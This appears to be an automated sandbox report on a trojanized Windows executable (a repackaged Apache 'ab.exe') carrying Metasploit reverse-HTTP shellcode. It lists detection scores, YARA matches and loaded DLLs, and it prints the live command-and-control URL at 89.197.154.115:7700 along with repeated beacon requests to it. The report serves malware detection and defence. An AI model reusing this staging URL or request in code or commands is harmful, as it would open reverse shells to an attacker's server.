Source: DRVf7H9j4V.exe |
Malware Configuration Extractor: Metasploit {"Type": "Shell Reverse Http", "URL": "http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF"} |
Source: DRVf7H9j4V.exe |
ReversingLabs: Detection: 81% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: DRVf7H9j4V.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: |
Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: DRVf7H9j4V.exe |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then xor edx, dword ptr [90909090h] |
0_2_0040A430 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then push ebp |
0_2_00401E39 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then sti |
0_2_004056C0 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then enter FAFFh, 90h |
0_2_004066E0 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then sti |
0_2_004056F0 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then or dword ptr [ebx+104D8BECh], 8B08456Dh |
0_2_00408680 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then xchg dword ptr [eax+21909081h], edx |
0_2_004058A1 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then sti |
0_2_004056B1 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then sti |
0_2_0040566F |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then enter FAFFh, 90h |
0_2_004067C3 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then xchg dword ptr [eax+21909081h], edx |
0_2_004059A4 |
Source: Malware configuration extractor |
URLs: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 63653 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 63654 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 63655 -> 7700 |
Source: global traffic |
TCP traffic: 192.168.2.8:49704 -> 89.197.154.115:7700 |
Source: Joe Sandbox View |
IP Address: 89.197.154.115 89.197.154.115 |
Source: Joe Sandbox View |
ASN Name: VIRTUAL1GB VIRTUAL1GB |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp, DRVf7H9j4V.exe, 00000000.00000002.2240362748.00000000007AE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kq |
Source: DRVf7H9j4V.exe |
String found in binary or memory: http://www.apache.org/ |
Source: DRVf7H9j4V.exe |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: DRVf7H9j4V.exe |
String found in binary or memory: http://www.zeustech.net/ |
Source: DRVf7H9j4V.exe, type: SAMPLE |
Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown |
Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown |
Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown |
Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown |
Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown |
Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_0040162C |
0_2_0040162C |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00690095 |
0_2_00690095 |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe |
Source: DRVf7H9j4V.exe |
Binary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe |
Source: DRVf7H9j4V.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: DRVf7H9j4V.exe, type: SAMPLE |
Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23 |
Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23 |
Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23 |
Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23 |
Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23 |
Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23 |
Source: DRVf7H9j4V.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: classification engine |
Classification label: mal100.troj.winEXE@1/0@0/1 |
Source: DRVf7H9j4V.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: DRVf7H9j4V.exe |
ReversingLabs: Detection: 81% |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: wsock32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 |
Jump to behavior |
Source: DRVf7H9j4V.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: |
Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: DRVf7H9j4V.exe |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00401877 pushad ; retf |
0_2_00401A79 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004070D9 push ebx; iretd |
0_2_004070DD |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004012DB push FFFFFFCAh; ret |
0_2_00401308 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00402779 push ebp; ret |
0_2_0040277A |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00405123 push edi; retn 0010h |
0_2_00405125 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00401527 push esi; ret |
0_2_00401528 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004055C6 push edx; ret |
0_2_004055C9 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004017D1 pushad ; retf |
0_2_00401A79 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004079EC push eax; retf |
0_2_004079ED |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00401DFC push 00401450h; iretd |
0_2_00401E0A |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00403F92 push ebp; ret |
0_2_00403F9A |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004017BC pushad ; retf |
0_2_00401A79 |
Source: DRVf7H9j4V.exe |
Static PE information: section name: .text entropy: 7.017108244459124 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 63653 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 63654 -> 7700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 63655 -> 7700 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe TID: 6108 |
Thread sleep time: -45000s >= -30000s |
Jump to behavior |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.0000000000777000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW0 |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%%,b |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: Yara match |
File source: DRVf7H9j4V.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY |